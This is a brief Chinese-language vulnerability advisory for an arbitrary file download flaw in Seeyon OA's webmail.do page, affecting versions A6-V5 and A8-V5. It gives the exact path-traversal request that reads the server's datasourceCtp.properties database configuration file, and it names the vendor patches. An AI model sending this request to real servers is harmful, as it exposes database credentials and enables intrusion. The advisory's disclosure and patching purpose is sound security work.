介紹
致遠OA是北京致遠互聯軟件股份有限公司研發一款辦公系統。
漏洞詳情及危害
致遠OA webmail.do文件讀取漏洞,
由於 /seeyon/webmail.do 頁面 filePath 參數過濾不嚴,導致可以讀取系統敏感文件。
通過修改filePath參數來下載服務器文件
/seeyon/webmail.do?method=doDownloadAtt&filename=conf&filePath=../conf/datasourceCtp.properties
影響范圍
A6-V5、A8-V5
漏洞利用
訪問
http://xx.xx.xxx.xx/seeyon/webmail.do?method=doDownloadAtt&filename=conf&filePath=../conf/datasourceCtp.properties

datasourceCtp.properties文件內容為:

漏洞修復
V5-webmail任意文件下載漏洞補丁
G6-webmail任意文件下載漏洞補丁
